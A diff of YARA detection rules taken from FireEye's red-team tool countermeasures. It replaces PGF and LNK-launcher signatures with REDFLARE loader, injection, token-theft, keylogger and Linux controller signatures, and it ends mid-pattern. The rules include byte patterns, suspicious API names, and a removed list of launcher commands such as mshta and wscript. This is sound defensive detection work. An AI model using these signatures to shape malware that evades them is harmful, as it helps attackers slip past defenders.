+		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [6-20] 00 00 00 00 [6-20] 00 00 00 00 [2-10] 00 00 00 00 45 33 C9 [4-20] 48 8D 15 [4] 48 8B 0D [4] FF 15 [4-50] B9 14 00 00 00 E8 }
 
 	condition:
-		$header at 0 and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Hunting_LNK_Win_Genericlauncher : FILE
+rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_2 : FILE
 {
 	meta:
-		description = "Signature to detect LNK files or OLE objects with embedded LNK files and generic launcher commands, except powershell which is large enough to have its own gene"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1a12e475-bb18-55ab-b629-47b711c10e6b"
-		date = "2018-09-04"
+		id = "6a585401-bfd3-5aad-b484-09b6a30d9af5"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/LNKSMASHER/supplemental/yara/Hunting_LNK_Win_GenericLauncher.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_2.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "14dd758e8f89f14612c8df9f862c31e4"
-		logic_hash = "a654cd3594e2d09950fb11bf8721a5cdb89f5d5be6e706f12e18c7fcdf7dd0fe"
-		score = 60
-		quality = 53
+		hash = "4e7e90c7147ee8aa01275894734f4492"
+		logic_hash = "98dfb71adbde4f8965e612c19f0965d8fa95805825569290fdf72eb1d86cfb70"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		rev = 7
+		rev = 1
 
 	strings:
-		$a01 = "cmd.exe /" ascii nocase wide
-		$a02 = "cscript" ascii nocase wide
-		$a03 = "jscript" ascii nocase wide
-		$a04 = "wscript" ascii nocase wide
-		$a05 = "wmic" ascii nocase wide
-		$a07 = "mshta" ascii nocase wide
-		$header = { 4C 00 00 00 01 14 02 }
+		$inject = { 83 F8 01 [4-50] 6A 00 6A 00 68 04 00 00 08 6A 00 6A 00 6A 00 6A 00 5? [10-70] FF 15 [4] 85 C0 [1-20] 6A 04 68 00 10 00 00 5? 6A 00 5? [1-10] FF 15 [4-8] 85 C0 [1-20] 5? 5? 5? 8B [1-4] 5? 5? FF 15 [4] 85 C0 [1-20] 6A 20 [4-20] FF 15 [4] 85 C0 [1-40] 01 00 01 00 [2-20] FF 15 [4] 85 C0 [1-30] FF 15 [4] 85 C0 [1-20] FF 15 [4] 83 F8 FF }
+		$s1 = "ResumeThread"
 
 	condition:
-		(( $header at 0 ) or ( ( uint32( 0 ) == 0xE011CFD0 ) and $header ) ) and ( 1 of ( $a* ) )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Inmemorycompilation_1 : FILE
+rule FIREEYE_RT_APT_Loader_Raw64_REDFLARE_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'In-MemoryCompilation' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "80234352-a449-5292-9f0c-beb7a1d39a6c"
-		date = "2020-12-08"
+		id = "8e937f6a-404f-53bd-9de2-ed63b1cf48b2"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MEMCOMP/production/yara/Loader_MSIL_InMemoryCompilation_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw64_REDFLARE_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "a964a186eb02a2792db01727a31ddaa2414fe9df83cda9b1c9db15d94603303a"
+		hash = "5e14f77f85fd9a5be46e7f04b8a144f5"
+		logic_hash = "dac122ccece8a6dd35a5fe9d37860a612aa50ab469b79f4375dbe776f60c7b57"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "524d2687-0042-4f93-b695-5579f3865205" ascii nocase wide
+		$load = { EB ?? 58 48 8B 10 4C 8B 48 ?? 48 8B C8 [1-10] 48 83 C1 ?? 48 03 D1 FF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) != 0x5A4D ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_4 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "d46d9ae9-cb7d-5a25-9ee2-766097c14af6"
-		date = "2020-11-26"
-		date = "2020-11-26"
+		id = "dc162f26-66d3-5359-b1d7-ef2208b359e2"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_4.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "4414953fa397a41156f6fa4f9462d207"
-		logic_hash = "4256bfd3713f330d76cad9d1ddbba91e588dbca2e2b6842e9482525805ddc1e8"
+		hash = "f20824fa6e5c81e3804419f108445368"
+		logic_hash = "2cae245a6aa36dccc2228cccefdc4ca0eb278901f063e072a369000f67d73a55"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { C7 44 24 0C 04 00 00 00 C7 44 24 08 00 10 00 00 [4-32] C7 04 24 00 00 00 00 [0-32] FF [1-16] 89 45 ?? 83 7D ?? 00 [2-150] 0F B? ?? 8B [2] B? CD CC CC CC 89 ?? F7 ?? C1 ?? 04 89 ?? C1 ?? 02 [0-32] 0F B? [5-32] 3? [1-16] 88 }
-		$sb2 = { C? 45 ?? B8 [0-4] C? 45 ?? 00 [0-64] FF [0-32] E0 [0-32] C7 44 24 08 40 00 00 00 [0-32] C7 44 24 04 07 00 00 00 [0-32] FF [1-64] 89 ?? 0F B? [2-3] 89 ?? 04 0F B? [2] 88 ?? 06 8B ?? 08 8D ?? 01 8B 45 0C }
+		$alloc_n_load = { 41 B9 40 00 00 00 41 B8 00 30 00 00 33 C9 [1-10] FF 50 [4-80] F3 A4 [30-120] 48 6B C9 28 [3-20] 48 6B C9 28 }
+		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_2 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1f2280c0-0fdd-5930-947a-931274bccd6f"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "043f4e29-710d-5e17-a0ed-82cd3a565194"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_2.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "2b686a8b83f8e1d8b455976ae70dab6e"
-		logic_hash = "2e84d614c34b0b7f93fa70fa3312f22e3ff23f2abd33b2e19c00dd6cba7dcfdc"
+		hash = "100d73b35f23b2fe84bf7cd37140bf4d"
+		logic_hash = "9fad845ed963fae46ac7ddc44407d5f6ed0a061f6a106764b9f912ef718279b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { B9 14 00 00 00 FF 15 [4-32] 0F B6 ?? 04 [0-32] F3 A4 [0-64] 0F B6 [2-3] 0F B6 [2-3] 33 [0-32] 88 [1-9] EB }
-		$sb2 = { 41 B8 00 30 00 00 [0-32] FF 15 [8-64] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [1-64] FF ( D? | 5? ) }
-		$sb3 = { 48 89 4C 24 08 [4-64] 48 63 48 3C [0-32] 48 03 C1 [0-64] 0F B7 48 14 [0-64] 48 8D 44 08 18 [8-64] 0F B7 40 06 [2-32] 48 6B C0 28 }
+		$alloc = { 45 8B C0 33 D2 [2-6] 00 10 00 00 [2-6] 04 00 00 00 [1-6] FF 15 [4-60] FF 15 [4] 85 C0 [4-40] 20 00 00 00 [4-40] FF 15 [4] 85 C0 }
+		$inject = { 83 F8 01 [2-20] 33 C0 45 33 C9 [3-10] 45 33 C0 [3-10] 33 D2 [30-100] FF 15 [4] 85 C0 [20-100] 01 00 10 00 [0-10] FF 15 [4] 85 C0 [4-30] FF 15 [4] 85 C0 [2-20] FF 15 [4] 83 F8 FF }
+		$s1 = "ResumeThread" fullword
 
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win_PGF_2 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_4 : FILE
 {
 	meta:
-		description = "PE rich header matches PGF backdoor"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "595c9e2a-3d9d-5366-9449-de1bcf333f78"
-		date = "2020-12-08"
+		id = "6e8621b0-a0ee-5fc7-a2b8-1973a42d6e37"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_4.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "226b1ac427eb5a4dc2a00cc72c163214"
-		logic_hash = "b8c024c6b4c3ce9915700b62da8a1f12440215b46f3a56078707f5257e575811"
+		hash = "a8b5dcfea5e87bf0e95176daa243943d, 9dcb6424662941d746576e62712220aa"
+		logic_hash = "d027e98ad8fa6d03a49ceffd81fba6a621173e2dbabae652bee2f4e8489bb378"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		md5_2 = "2398ed2d5b830d226af26dedaf30f64a"
-		md5_3 = "24a7c99da9eef1c58f09cf09b9744d7b"
-		md5_4 = "aeb0e1d0e71ce2a08db9b1e5fb98e0aa"
-		rev = 4
+		rev = 2
 
 	strings:
-		$rich1 = { A8 B7 17 3A EC D6 79 69 EC D6 79 69 EC D6 79 69 2F D9 24 69 E8 D6 79 69 E5 AE EC 69 EA D6 79 69 EC D6 78 69 A8 D6 79 69 E5 AE EA 69 EF D6 79 69 E5 AE FA 69 D0 D6 79 69 E5 AE EB 69 ED D6 79 69 E5 AE FD 69 E2 D6 79 69 CB 10 07 69 ED D6 79 69 E5 AE E8 69 ED D6 79 69 }
-		$rich2 = { C1 CF 75 A4 85 AE 1B F7 85 AE 1B F7 85 AE 1B F7 8C D6 88 F7 83 AE 1B F7 0D C9 1A F6 87 AE 1B F7 0D C9 1E F6 8F AE 1B F7 0D C9 1F F6 8F AE 1B F7 0D C9 18 F6 84 AE 1B F7 DE C6 1A F6 86 AE 1B F7 85 AE 1A F7 BF AE 1B F7 84 C3 12 F6 81 AE 1B F7 84 C3 E4 F7 84 AE 1B F7 84 C3 19 F6 84 AE 1B F7 }
-		$rich3 = { D6 60 82 B8 92 01 EC EB 92 01 EC EB 92 01 EC EB 9B 79 7F EB 94 01 EC EB 1A 66 ED EA 90 01 EC EB 1A 66 E9 EA 98 01 EC EB 1A 66 E8 EA 9A 01 EC EB 1A 66 EF EA 90 01 EC EB C9 69 ED EA 91 01 EC EB 92 01 ED EB AF 01 EC EB 93 6C E5 EA 96 01 EC EB 93 6C 13 EB 93 01 EC EB 93 6C EE EA 93 01 EC EB }
-		$rich4 = { 41 36 64 33 05 57 0A 60 05 57 0A 60 05 57 0A 60 73 CA 71 60 01 57 0A 60 0C 2F 9F 60 04 57 0A 60 0C 2F 89 60 3D 57 0A 60 0C 2F 8E 60 0A 57 0A 60 05 57 0B 60 4A 57 0A 60 0C 2F 99 60 06 57 0A 60 73 CA 67 60 04 57 0A 60 0C 2F 98 60 04 57 0A 60 0C 2F 80 60 04 57 0A 60 22 91 74 60 04 57 0A 60 0C 2F 9B 60 04 57 0A 60 }
+		$s1 = "LogonUserW" fullword
+		$s2 = "ImpersonateLoggedOnUser" fullword
+		$s3 = "runCommand" fullword
+		$user_logon = { 22 02 00 00 [1-10] 02 02 00 00 [0-4] E8 [4-40] ( 09 00 00 00 [1-10] 03 00 00 00 | 6A 03 6A 09 ) [4-30] FF 15 [4] 85 C0 7? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and ( ( $rich1 at 128 ) or ( $rich2 at 128 ) or ( $rich3 at 128 ) or ( $rich4 at 128 ) )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_4 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_3 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "4c93ba76-d3a5-568d-88b8-79a6ebc2edbb"
-		date = "2020-11-26"
-		date = "2020-11-26"
+		id = "2f6785c4-f4d0-52ff-8c46-da953e2ca92a"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_4.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_3.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
-		logic_hash = "fcc92674e58ec6418d7c709e3f3bc2e1ec859fe0cb444412964a978fb69f5234"
+		hash = "9ccda4d7511009d5572ef2f8597fba4e,ece07daca53dd0a7c23dacabf50f56f1"
+		logic_hash = "ee104bc145686a134e4d6d620dae7d1dacff7645d47f1a8d7a212327352b8e87"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 41 B9 04 00 00 00 41 B8 00 10 00 00 BA [4] B9 00 00 00 00 [0-32] FF [1-24] 7? [1-150] 8B 45 [0-32] 44 0F B? ?? 8B [2-16] B? CD CC CC CC [0-16] C1 ?? 04 [0-16] C1 ?? 02 [0-16] C1 ?? 02 [0-16] 48 8? 05 [4-32] 31 [1-4] 88 }
-		$sb2 = { C? 45 ?? 48 [0-32] B8 [0-64] FF [0-32] E0 [0-32] 41 B8 40 00 00 00 BA 0C 00 00 00 48 8B [2] 48 8B [2-32] FF [1-16] 48 89 10 8B 55 ?? 89 ?? 08 48 8B [2] 48 8D ?? 02 48 8B 45 18 48 89 02 }
+		$calc_image_size = { 28 00 00 00 [2-30] 83 E2 1F [4-20] C1 F8 05 [0-8] 0F AF C? [0-30] C1 E0 02 }
+		$str1 = "CreateCompatibleBitmap" fullword
+		$str2 = "BitBlt" fullword
+		$str3 = "runCommand" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_PGF_1 : FILE
+rule FIREEYE_RT_APT_Keylogger_Win64_REDFLARE_1 : FILE
 {
 	meta:
-		description = "base.cs"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "39d9821f-86e8-528a-a0a9-287dbe325484"
-		date = "2020-11-24"
-		date = "2020-11-24"
+		id = "3c980f5a-c775-5c25-ba28-91a93a1b9a85"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_MSIL_PGF_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Keylogger_Win64_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a495c6d11ff3f525915345fb762f8047"
-		logic_hash = "4174ed53336f3951d26282dc81b99b2044ac6350d4b4c0074194a9b4acecefee"
+		hash = "fbefb4074f1672a3c29c1a47595ea261"
+		logic_hash = "26fe577ba637c484d9a8ccc2173b5892a76328a90a39a2bebbae6bd2a6329485"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 72 [4] 6F [2] 00 0A 26 [0-16] 0? 6F [2] 00 0A [1-3] 0? 28 [2] 00 0A [0-1] 0? 72 [4-5] 0? 28 [2] 00 0A [0-1] 0? 6F [2] 00 0A 13 ?? 1? 13 ?? 38 [8-16] 91 [3-6] 8E 6? 5D 91 61 D2 9C 11 ?? 1? 58 13 [3-5] 8E 6? 3F }
+		$create_window = { 41 B9 00 00 CF 00 [4-40] 33 C9 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 [2-10] 00 00 00 80 FF 15 }
+		$keys_check = { B9 14 00 00 00 FF 15 [4-8] B9 10 00 00 00 FF 15 [4] BE 00 80 FF FF 66 85 C6 75 ?? B9 A0 00 00 00 FF 15 [4] 66 85 C6 75 ?? B9 A1 00 00 00 FF 15 [4] 66 85 C6 74 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_2 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_5 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/dllmain/"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e11a626b-ce91-5f6c-a514-9a8a02a29cbd"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "892981d6-f310-5ee8-95b5-dd4bd720a86c"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_2.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_5.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "04eb45f8546e052fe348fda2425b058c"
-		logic_hash = "d69f3f31c4964fe933295563e08bdbb36abadd6611541b9ffa55b6829ced1d21"
+		hash = "dfbb1b988c239ade4c23856e42d4127b, 3322fba40c4de7e3de0fda1123b0bf5d"
+		logic_hash = "ab38e5ebded026829672941709797b40f8e13fb244b6a8ed3545de4358f727b8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { 6A ?? FF 15 [4-16] 8A ?? 04 [0-16] 8B ?? 1C [0-64] 0F 10 ?? 66 0F EF C8 0F 11 [0-32] 30 [2] 8D [2] 4? 83 [2] 7? }
-		$sb2 = { 8B ?? 08 [0-16] 6A 40 68 00 30 00 00 5? 6A 00 [0-32] FF 15 [4-32] 5? [0-16] E8 [4-64] C1 ?? 04 [0-32] 8A [2] 3? [2] 4? 3? ?? 24 ?? 7? }
-		$sb3 = { 8B ?? 3C [0-16] 03 [1-64] 0F B? ?? 14 [0-32] 83 ?? 18 [0-32] 66 3? ?? 06 [4-32] 68 [4] 5? FF 15 [4-16] 85 C0 [2-32] 83 ?? 28 0F B? ?? 06 }
+		$s1 = "AdjustTokenPrivileges" fullword
+		$s2 = "LookupPrivilegeValueW" fullword
+		$s3 = "ImpersonateLoggedOnUser" fullword
+		$s4 = "runCommand" fullword
+		$steal_token = { FF 15 [4] 85 C0 [1-40] C7 44 24 ?? 01 00 00 00 [0-20] C7 44 24 ?? 02 00 00 00 [0-20] FF 15 [4] FF [1-5] 85 C0 [4-40] 00 04 00 00 FF 15 [4-5] 85 C0 [2-20] ( BA 0F 00 00 00 | 6A 0F ) [1-4] FF 15 [4] 85 C0 74 [1-20] FF 15 [4] 85 C0 74 [1-20] ( 6A 0B | B9 0B 00 00 00 ) E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_3 : FILE
+rule FIREEYE_RT_APT_Controller_Linux_REDFLARE_1 : FILE
 {
 	meta:
-		description = "PGF payload, generated rule based on symfunc/8a2f2236fdfaa3583ab89076025c6269. Identifies dllmain_hook x64 payloads."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "340ea6d4-7111-520c-9bd4-0465a43ea235"
-		date = "2020-12-08"
+		id = "79a69740-7209-5c56-ad6f-eb4d0b29beaf"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_3.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Controller_Linux_REDFLARE_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
-		logic_hash = "fd82bdec54a76eed12cc8820ef39899f31ea6df21d905530a0d53770b3d9901b"
+		hash = "79259451ff47b864d71fb3f94b1774f3, 82773afa0860d668d7fe40e3f22b0f3e"
+		logic_hash = "d6b0cc5f386da9bff8a8293f2b3857406044ab42f7c1bb23d5096052a3c42ce4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 4
+		rev = 1
 
 	strings:
-		$cond1 = { 55 53 48 89 E5 48 81 EC 28 07 00 00 48 8B 05 80 8B 06 00 FF D0 48 89 C1 48 8D 85 98 FD FF FF 41 B8 04 01 00 00 48 89 C2 E8 5A B4 00 00 85 C0 0F 94 C0 84 C0 0F 85 16 03 00 00 48 8D 45 AF 48 89 C1 E8 E9 FE 00 00 48 8D 4D AF 48 8D 95 98 FD FF FF 48 8D 85 78 FD FF FF 49 89 C8 48 89 C1 E8 AC 96 01 00 48 8D 45 AF 48 89 C1 E8 F0 FE 00 00 48 8B 05 25 8B 06 00 FF D0 89 C2 B9 08 00 00 00 E8 6B B4 00 00 48 89 45 D0 48 83 7D D0 00 75 0A BB 00 00 00 00 E9 6C 02 00 00 48 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 C7 85 38 F9 FF FF 38 04 00 00 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 AA B3 00 00 89 45 E8 83 7D E8 00 74 57 48 8D 85 38 F9 FF FF 48 8D 50 30 48 8D 85 78 FD FF FF 41 B8 00 00 00 00 48 89 C1 E8 61 F3 00 00 48 83 F8 FF 0F 95 C0 84 C0 74 14 48 8B 85 50 F9 FF FF 48 89 45 F0 8B 85 58 F9 FF FF 89 45 EC 48 8D 95 38 F9 FF FF 48 8B 45 D0 48 89 C1 E8 4F B3 00 00 89 45 E8 EB A3 48 8B 45 D0 48 89 C1 48 8B 05 20 8A 06 00 FF D0 48 83 7D F0 00 74 06 83 7D EC 00 75 0A BB 00 00 00 00 E9 B9 01 00 00 48 8D 0D 0E C8 05 00 48 8B 05 69 8A 06 00 FF D0 48 8D 15 0A C8 05 00 48 89 C1 48 8B 05 5E 8A 06 00 FF D0 48 89 45 C8 48 89 E8 48 89 45 E0 48 8D 95 28 F9 FF FF 48 8D 85 30 F9 FF FF 48 89 C1 48 8B 05 19 8A 06 00 FF D0 C7 45 DC 00 00 00 00 48 8B 55 E0 48 8B 85 28 F9 FF FF 48 39 C2 0F 83 0D 01 00 00 48 8B 45 E0 48 8B 00 48 3D FF 0F 00 00 0F 86 EC 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 C8 73 1E 48 8B 45 E0 48 8B 00 48 8B 55 C8 48 81 C2 00 10 00 00 48 39 D0 73 07 C7 45 DC 01 00 00 00 83 7D DC 00 0F 84 BB 00 00 00 48 8B 45 E0 48 8B 00 48 39 45 F0 0F 83 AA 00 00 00 48 8B 45 E0 48 8B 00 8B 4D EC 48 8B 55 F0 48 01 CA 48 39 D0 0F 83 90 00 00 00 48 C7 85 F8 F8 FF FF 00 00 00 00 48 C7 85 00 F9 FF FF 00 00 00 00 48 C7 85 08 F9 FF FF 00 00 00 00 48 C7 85 10 F9 FF FF 00 00 00 00 48 C7 85 18 F9 FF FF 00 00 00 00 48 C7 85 20 F9 FF FF 00 00 00 00 48 8B 45 E0 48 8B 00 48 8D 95 F8 F8 FF FF 41 B8 30 00 00 00 48 89 C1 48 8B 05 01 8A 06 00 FF D0 8B 85 1C F9 FF FF 83 E0 20 85 C0 74 20 48 8B 45 E0 48 8B 00 48 8D 15 E0 F9 FF FF 48 89 